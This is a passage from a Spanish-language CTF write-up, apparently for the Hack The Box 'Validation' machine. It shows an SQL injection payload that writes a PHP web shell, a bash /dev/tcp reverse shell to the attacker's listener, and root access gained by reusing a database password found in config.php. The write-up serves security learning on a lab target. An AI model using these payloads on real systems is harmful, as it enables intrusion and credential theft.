</pre></table></code></div></div><ul><li>secure_file_priv:””</ul><p>Ya hemos comprobado que cumplimos con todos los requisitos para poder escribir archivos del lado del servidor. Suponiendo que la web se esté alojando en la ruta del sistema <code class="language-plaintext highlighter-rouge">/var/www/html</code> subiremos en esa ruta la web shell.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' UNION SELECT "&lt;?php system($_REQUEST['cmd']); ?&gt;" INTO OUTFILE "/var/www/html/WebShell.php"-- -
</pre></table></code></div></div><p><img data-src="/assets/img/commons/validation/webshell.png" alt="Web shell" class="center-image" data-proofer-ignore> <em>Web shell</em></p><p>Vamos a mandarnos una reverse shell hacia nuestro equipo para trabajar más comodamente. Lo primero de todo, es ponernos en escucha con <code class="language-plaintext highlighter-rouge">netcat</code>.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>❯ nc -nlvp 443
listening on [any] 443 ...
</pre></table></code></div></div><p>Ya estando en escucha introducimos el siguiente comando en la web shell, es IMPORTANTE que lo introduzcamos codificado en url. Podemos utilizar páginas web como <a href="https://www.urlencoder.org/">esta</a> o herramientas como <code class="language-plaintext highlighter-rouge">urlencode</code>.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>bash -c "bash -i &gt;&amp; /dev/tcp/10.10.14.16/443 0&gt;&amp;1"
</pre></table></code></div></div><p>Ya hemos establecido la reverse shell, ahora vamos a tratarla para hacerla completamente funcional.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>❯ nc -nlvp 443
listening on [any] 443 ...
Connection from 10.129.97.4:53268
❯ script /dev/null -c bash
Script started, file is /dev/null
❯ CTRL + Z
[1]+ Detenido		nc -nlvp 443
❯ stty raw -echo; fg
nc -nlvp 443
	reset
reset: unknow terminal type unknown
Terminal type? xterm
❯ export SHELL=bash
❯ export TERM=xterm
❯ stty rows 42 columns 174
</pre></table></code></div></div><h1 id="post-explotación">Post-explotación</h1><p>Lo primero, vamos a leer la flag del usuario.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>❯ cat user.txt 
64f93146bf458bb8****************
</pre></table></code></div></div><p>Vemos varios archivos en el directorio en el que se aloja la web, uno de ellos nos llama especialmente la atención, el archivo <code class="language-plaintext highlighter-rouge">config.php</code>. Lo leemos y encontramos unas credenciales que parecen ser del usuario <code class="language-plaintext highlighter-rouge">uhc</code>.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>❯ cat config.php
&lt;?php
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "uhc-9qual-global-pw";
  $dbname = "registration";

  $conn = new mysqli($servername, $username, $password, $dbname);
?&gt;
</pre></table></code></div></div><p>Vamos a intentar convertirnos en el usuario <code class="language-plaintext highlighter-rouge">uhc</code>.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>❯ su uhc
su: user uhc does not exist or the user entry does not contain all the required fields
</pre></table></code></div></div><p>Nos dice que el usuario <code class="language-plaintext highlighter-rouge">uhc</code> no existe, vamos a comprobarlo nosotros mismos.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>❯ cat /etc/passwd | grep uhc
</pre></table></code></div></div><p>No nos da ningun output por lo que corroboramos que no existe el usuario <code class="language-plaintext highlighter-rouge">uhc</code>, intentemos probar la contraseña encontrada con el usuaro <code class="language-plaintext highlighter-rouge">root</code>.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>❯ su root                   
Password: 
❯ whoami
root
❯ cat /root/root.txt 
79e15433aa1884bb****************
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/writeup/'>Writeup</a>, <a href='/categories/htb/'>HTB</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/linux/" class="post-tag no-text-decoration" >Linux</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >CTF</a> <a href="/tags/easy/" class="post-tag no-text-decoration" >Easy</a> <a href="/tags/sqli/" class="post-tag no-text-decoration" >SQLi</a> <a href="/tags/burpsuite/" class="post-tag no-text-decoration" >Burpsuite</a> <a href="/tags/credenciales/" class="post-tag no-text-decoration" >Credenciales</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> Esta entrada está licenciada bajo <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> por el autor.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Compartir</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Validation+Writeup+-+xDaNN1&url=https%3A%2F%2Fxdann1.github.io%2Fposts%2Fwriteup-validation%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Validation+Writeup+-+xDaNN1&u=https%3A%2F%2Fxdann1.github.io%2Fposts%2Fwriteup-validation%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fxdann1.github.io%2Fposts%2Fwriteup-validation%2F&text=Validation+Writeup+-+xDaNN1" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fxdann1.github.io%2Fposts%2Fwriteup-validation%2F" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copiar enlace" data-title-succeed="¡Enlace copiado!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Actualizado recientemente</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/inyecciones-sql/">Inyecciones SQL</a><li><a href="/posts/oscp-review/">OSCP Review</a><li><a href="/posts/crto-review/">CRTO Review</a><li><a href="/posts/writeup-sizzle/">Sizzle Writeup</a></ul></div><div id="access-tags"><div class="panel-heading">Etiquetas populares</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/easy/">Easy</a> <a class="post-tag" href="/tags/sqli/">SQLi</a> <a class="post-tag" href="/tags/certificaci%C3%B3n/">Certificación</a> <a class="post-tag" href="/tags/lfi/">LFI</a> <a class="post-tag" href="/tags/pentesting/">Pentesting</a> <a class="post-tag" href="/tags/suid/">SUID</a> <a class="post-tag" href="/tags/crackeo-contrase%C3%B1as/">Crackeo Contraseñas</a> <a class="post-tag" href="/tags/cve/">CVE</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contenido</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Lecturas adicionales</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/writeup-goodgames/"><div class="card-body"> <em class="timeago small" data-ts="1661724000" > 2022-08-29 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>GoodGames Writeup</h3><div class="text-muted small"><p> Máquina Easy, nos aprovechamos de una inyección SQL para saltarnos el panel de login, convirtiendonos en el usuario administrador de la página, encontramos un subdominio y metemos en él unas creden...</p></div></div></a></div><div class="card"> <a href="/posts/writeup-pandora/"><div class="card-body"> <em class="timeago small" data-ts="1653948000" > 2022-05-31 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Pandora Writeup</h3><div class="text-muted small"><p> Máquina Easy, encontramos un puerto abierto en UDP que corre una versión sin casi seguridad, lo enumeramos hasta encontrar unas credenciales válidas para ssh, encontramos una web oculta vulnerable ...</p></div></div></a></div><div class="card"> <a href="/posts/writeup-paper/"><div class="card-body"> <em class="timeago small" data-ts="1655503200" > 2022-06-18 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Paper Writeup</h3><div class="text-muted small"><p> Máquina Easy, nos aprovechamos de un filtrado de información para acceder a un subdominio el cual tiene una vulnerabilidad que nos permite ver información oculta, conseguimos autenticarnos contra u...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/writeup-pandora/" class="btn btn-outline-primary" prompt="Anterior"><p>Pandora Writeup</p></a> <a href="/posts/writeup-paper/" class="btn btn-outline-primary" prompt="Nuevo"><p>Paper Writeup</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://github.com/xdann1">xdann1</a>. <span data-toggle="tooltip" data-placement="top" title="Salvo que se indique explícitamente, las entradas de este blog están licenciadas bajo la Creative Commons Attribution 4.0 International (CC BY 4.0) License por el autor.">Algunos derechos reservados.</span></p></div><div class="footer-right"><p class="mb-0"> Hecho con <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> usando el tema <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> .</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Etiquetas populares</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/easy/">Easy</a> <a class="post-tag" href="/tags/sqli/">SQLi</a> <a class="post-tag" href="/tags/certificaci%C3%B3n/">Certificación</a> <a class="post-tag" href="/tags/lfi/">LFI</a> <a class="post-tag" href="/tags/pentesting/">Pentesting</a> <a class="post-tag" href="/tags/suid/">SUID</a> <a class="post-tag" href="/tags/crackeo-contrase%C3%B1as/">Crackeo Contraseñas</a> <a class="post-tag" href="/tags/cve/">CVE</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">¡Oops! No se encuentran resultados.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/es.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
